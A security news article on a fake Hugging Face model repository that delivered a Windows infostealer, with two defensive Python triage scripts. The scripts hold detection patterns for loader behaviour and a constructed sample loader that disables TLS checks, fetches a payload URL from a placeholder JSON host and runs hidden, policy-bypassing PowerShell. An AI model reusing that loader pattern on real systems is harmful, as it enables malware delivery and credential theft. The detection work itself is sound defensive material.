A malicious repository managed to stay on Hugging Face's trending list for hours by posing as the open-weight version of OpenAI's Privacy Filter model, and was used as a vector to distribute an infostealer aimed at Windows users. According to the analysis published by the HiddenLayer research team, the project cloned the description of the legitimate model to inspire confidence and included instructions to run a Windows batch file and a Python loader which, when executed, disabled SSL verification, downloaded commands from a public JSON hosting service and finally launched an executable via PowerShell.
The attack shows two worrying features: on the one hand, the ability to turn an apparently harmless publication into a remote installer and, on the other, the use of public "dead drop resolvers" such as JSON Keeper to change payloads without touching the original repository. The loader used this technique to resolve an encoded URL that pointed to scripts hosted on infrastructure that has also been linked to previous campaigns distributing ValleyRAT, a modular remote access Trojan associated with operators known for supply chain and phishing campaigns.

In the infection chain described, the second stage escalated privileges through a UAC prompt, manipulated Microsoft Defender exclusions, installed a scheduled task to run the final binary and then erased local traces. The final component was designed to capture screenshots and exfiltrate credentials and data from cryptocurrency extensions and wallets, while trying to evade detection by disabling AMSI and ETW tracing. Hugging Face disabled access to the repository after it was detected, but before that the project had reached first position in trending and accumulated hundreds of thousands of downloads, numbers the researchers suspect were artificially inflated to generate confidence.
This incident highlights a paradigm shift: model and package platforms are no longer just passive repositories; they are potential initial access vectors that attackers try to exploit by combining social engineering, shared infrastructure and abuse of trust mechanisms such as placement on popular lists. The consequences matter to product teams, developers and security officers alike: apparent popularity does not guarantee integrity, and executing unreviewed downloaded scripts is a high-risk practice.

For users and teams handling third-party models and artifacts, the practical recommendations begin with applying the principle of least trust: do not run startup scripts (start.bat, leader.py or others) without auditing their content, run tests in isolated environments not connected to corporate networks, and prefer signed or verified payloads and artifacts. If you need to test a model, do it on virtual machines with snapshots, control outgoing traffic and analyze binaries and scripts with EDR tools and sandboxes. For repositories and packages, validate the author's identity, check that the model corresponds to the official project (for example, via links and metadata in the official organization) and review the commit history and any executable files included.
Model platforms must complement manual controls with automated scans that detect typosquatting patterns, near-identical description matches, scripts that perform remote downloads or disable security checks, and signs of metric manipulation (likes, downloads). It is also advisable to implement artifact signing and to verify integrity on the client side before allowing local execution, as well as to provide managed inference environments that avoid arbitrary code execution by the user. Similar measures appear in supply chain protection guidance from agencies such as CISA, and the remote execution techniques described in the ATT&CK framework should be consulted to tighten policies and detection: https://www.cisa.gov/supply-chain and https://attack.mitre.org/techniques/T1059/.
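The behaviour the article describes (TLS verification switched off, commands fetched from a public JSON host, a PowerShell launch) is exactly what an automated pre-execution scan of a downloaded repository can look for. The following Python script is an added example, not code from HiddenLayer, Hugging Face or the repository in question: it runs a set of indicator patterns over the text of a repository's scripts and assigns a coarse risk level. The file contents are constructed for the example (the file names follow the article; the host jsonkeeper.invalid and the repo id example-org/example-model are placeholders), and the indicator list is a starting point a team would extend with its own patterns.

```python
import re

# Each indicator is (label, regex). Patterns are deliberately broad: a hit is a
# reason for a human to read the script before running it, not proof of malice.
INDICATORS = [
    ("disables TLS verification",
     re.compile(r"verify\s*=\s*False|_create_unverified_context|CERT_NONE"
                r"|\bcurl\b[^\n]*\s(?:-k|--insecure)\b", re.I)),
    ("fetches instructions from a public paste/JSON host",
     re.compile(r"""https?://[^\s'"]*(?:jsonkeeper|jsonbin|npoint|pastebin|paste\.ee)""", re.I)),
    ("decodes an obfuscated URL or command",
     re.compile(r"b64decode|fromhex|FromBase64String", re.I)),
    ("launches PowerShell",
     re.compile(r"\bpowershell(?:\.exe)?\b", re.I)),
    ("PowerShell runs hidden or bypasses execution policy",
     # \W+ lets the pattern match across list quoting such as '-WindowStyle', 'Hidden'
     re.compile(r"-(?:ExecutionPolicy\W+Bypass|WindowStyle\W+Hidden|EncodedCommand\b)", re.I)),
    ("requests elevation (UAC)",
     re.compile(r"\brunas\b", re.I)),
    ("modifies Defender exclusions",
     re.compile(r"(?:Add|Set)-MpPreference|ExclusionPath", re.I)),
    ("creates a scheduled task",
     re.compile(r"\bschtasks\b[^\n]*/create|Register-ScheduledTask", re.I)),
    ("deletes files to cover its tracks",
     re.compile(r"\bdel\b[^\n]*/[qf]|Remove-Item|os\.remove|Clear-EventLog", re.I)),
]


def triage_script(text):
    """Return the labels of all indicators that fire on one script's text."""
    return [label for label, pattern in INDICATORS if pattern.search(text)]


def triage_repo(files):
    """Map each file name in a {name: contents} dict to its list of findings."""
    return {name: triage_script(contents) for name, contents in files.items()}


def classify(findings):
    """Coarse risk level from the number of distinct indicators that fired."""
    if not findings:
        return "clean"
    return "high" if len(findings) >= 3 else "medium"


# Constructed samples for the example; they are NOT the real repository content.
SAMPLE_FILES = {
    "start.bat": ("@echo off\r\n"
                  "REM constructed sample\r\n"
                  "python leader.py\r\n"
                  'del /q "%~f0"\r\n'),
    "leader.py": (
        "# constructed sample\n"
        "import requests, ssl, subprocess\n"
        "ssl._create_default_https_context = ssl._create_unverified_context\n"
        "cfg = requests.get('https://jsonkeeper.invalid/b/PLACEHOLDER', verify=False).json()\n"
        "stage2 = bytes.fromhex(cfg['u']).decode()\n"
        "subprocess.run(['powershell', '-ExecutionPolicy', 'Bypass',\n"
        "                '-WindowStyle', 'Hidden', '-File', stage2])\n"
    ),
    "model_card_example.py": (
        "# constructed benign sample: an ordinary Hugging Face model load\n"
        "from transformers import AutoModel\n"
        "model = AutoModel.from_pretrained('example-org/example-model')  # placeholder id\n"
    ),
}

if __name__ == "__main__":
    for name, findings in triage_repo(SAMPLE_FILES).items():
        print(f"{name}: {classify(findings)}", *findings, sep="\n    ")
```

Run against a real checkout, the scan would read every .bat, .ps1, .py and .sh file into the dict before calling triage_repo; the "medium" level exists because a single hit (self-deletion in a batch file, say) deserves a look but is not enough on its own to block an upload.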
If you suspect that you downloaded or executed the malicious repository's content, disconnect the machine from the network, preserve evidence (logs, temporary files, executed scripts) and carry out a forensic analysis, on site or remotely, with a specialized provider. Update antivirus signatures and run a scan, review scheduled tasks and Defender exclusions, and consider rotating potentially compromised credentials and keys. Reporting the incident to the platform (Hugging Face in this case) and sharing indicators with the community helps contain the operation and protect other users: the resilience of the ecosystem depends both on technical controls and on rapid communication of abuse.
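The advice to review scheduled tasks and Defender exclusions can be scripted for a first-pass triage. The Python below is an added example, not code from HiddenLayer, Hugging Face or Microsoft: it parses the CSV that `schtasks /query /fo csv /v` produces, flags tasks that launch from user-writable locations or run hidden/bypass PowerShell, and cross-checks each task's binary against the Defender exclusion list (on a real host that list comes from `(Get-MpPreference).ExclusionPath`). The CSV and exclusion list here are constructed with a reduced set of columns; the host WS01, the user alice and the two persistence tasks are invented, and the two Microsoft tasks serve as benign controls.

```python
import csv
import io
import re

# Locations a standard user can write to. Persistence launching from here is
# worth a look; a Defender exclusion covering the same place is a stronger signal.
USER_WRITABLE = re.compile(
    r"\\(?:AppData|Temp|ProgramData|Downloads|Users\\Public)(?:\\|$)"
    r"|%(?:TEMP|TMP|APPDATA|LOCALAPPDATA|PUBLIC)%", re.I)
HIDDEN_PS = re.compile(
    r"powershell[^\n]*(?:-WindowStyle\s+Hidden|-ExecutionPolicy\s+Bypass|-Enc(?:odedCommand)?\b)", re.I)
WIN_PATH = re.compile(r'[A-Za-z]:\\[^\s"]+')  # heuristic: stops at the first space


def risky_exclusions(exclusion_paths):
    """Defender exclusion paths that sit in user-writable locations."""
    return [p for p in exclusion_paths if USER_WRITABLE.search(p)]


def _covered(path, exclusion_paths):
    """True if `path` equals or lies beneath one of the exclusion paths."""
    path = path.lower()
    return any(path == ex.lower() or path.startswith(ex.lower().rstrip("\\") + "\\")
               for ex in exclusion_paths)


def triage_tasks(schtasks_csv, exclusion_paths):
    """Flag tasks from `schtasks /query /fo csv /v` output that run from user-writable
    paths, use hidden/bypass PowerShell, or launch something a Defender exclusion covers."""
    hits = []
    for row in csv.DictReader(io.StringIO(schtasks_csv.strip())):
        if row["TaskName"] == "TaskName":  # schtasks repeats the header line per task folder
            continue
        cmd = row["Task To Run"]
        reasons = []
        if USER_WRITABLE.search(cmd):
            reasons.append("runs from a user-writable path")
        if HIDDEN_PS.search(cmd):
            reasons.append("hidden/bypass PowerShell")
        if any(_covered(p, exclusion_paths) for p in WIN_PATH.findall(cmd)):
            reasons.append("covered by a Defender exclusion")
        if reasons:
            hits.append({"task": row["TaskName"], "command": cmd, "reasons": reasons})
    return hits


# Constructed sample: a subset of the columns schtasks prints, two normal tasks
# and two invented persistence tasks (names, host and paths are made up).
SAMPLE_SCHTASKS_CSV = r'''
"HostName","TaskName","Status","Author","Task To Run","Run As User"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM"
"WS01","\OneDrive Standalone Update Task","Ready","Microsoft Corporation","C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe","alice"
"HostName","TaskName","Status","Author","Task To Run","Run As User"
"WS01","\SystemHealthCheck","Ready","WS01\alice","C:\Users\alice\AppData\Local\Temp\health\update.exe","alice"
"WS01","\UpdaterHelper","Ready","WS01\alice","powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\Public\helper.ps1","alice"
'''

# Constructed sample of (Get-MpPreference).ExclusionPath on the same host.
SAMPLE_EXCLUSIONS = [
    r"C:\Users\alice\AppData\Local\Temp\health",
    r"C:\Users\Public",
    r"C:\Program Files\Example Vendor",
]

if __name__ == "__main__":
    for ex in risky_exclusions(SAMPLE_EXCLUSIONS):
        print("user-writable exclusion:", ex)
    for hit in triage_tasks(SAMPLE_SCHTASKS_CSV, SAMPLE_EXCLUSIONS):
        print(hit["task"], "->", hit["command"], "|", ", ".join(hit["reasons"]))
```

On a live host, export the task list with `schtasks /query /fo csv /v > tasks.csv` and the exclusions with PowerShell, then feed both to triage_tasks; the heuristics will also surface some legitimate per-user updaters that live under AppData, so treat the output as a review queue rather than a verdict, and preserve the exported files as evidence before changing anything.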